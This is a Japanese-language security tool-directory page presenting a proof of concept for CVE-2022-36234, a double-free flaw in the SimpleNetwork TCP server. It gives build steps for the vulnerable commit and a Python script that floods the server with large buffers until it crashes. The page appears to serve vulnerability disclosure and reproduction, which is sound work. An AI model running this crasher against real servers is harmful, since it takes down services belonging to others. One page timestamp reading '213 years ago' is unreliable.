Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-36234 — CVE-2022-36234 の概念実証 | Kitploit
ツール/GitHubGitHub/halcy0nic/cve-2022-36234
脆弱性分析エクスプロイトファジングペネトレーションテスト学習と教育バイナリエクスプロイト
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

CVE-2022-36234 の概念実証

リポジトリを見る
213年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-36234 の説明

SimpleNetwork TCP Server のコミット 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 には、細工された TCP パケットを介して悪用される二重解放の脆弱性が含まれていることが判明しました。二重解放を誘発することで、クライアントは任意の SimpleNetwork TCP サーバーをリモートでクラッシュさせることができます。また、他の状況では、二重解放の脆弱性は未定義の動作を引き起こし、状況によってはコード実行につながる可能性があります。

再現手順

ライブラリのコンパイルに必要な標準ビルドツールを確実に用意するため、以下のパッケージをインストールしてください (ほとんどのシステムでは既にインストールされています):

root@kitploit:~
sudo apt-get install build-essential git

この脆弱性は、TCP パケット内に大量の文字バッファを含む連続的なリクエストをサーバーに送信することで再現できます。まず、ソースコードに含まれる 'libSimpleNetwork' ライブラリとサンプルサーバーをコンパイルします:

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

サンプルサーバーを起動:

root@kitploit:~
./server 80 1

以下の python3 概念実証 (proof of concept) スクリプトをファイルに保存します (必要に応じてホストを変更してください):

root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")
ツールをダウンロード

python3 スクリプトを実行:

root@kitploit:~
python3 poc.py

クラッシュの検証:

成功すると、サーバーはクラッシュし、アプリケーションから以下の出力が表示されます:

root@kitploit:~
segmentation fault  ./server 80 1

参考情報

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234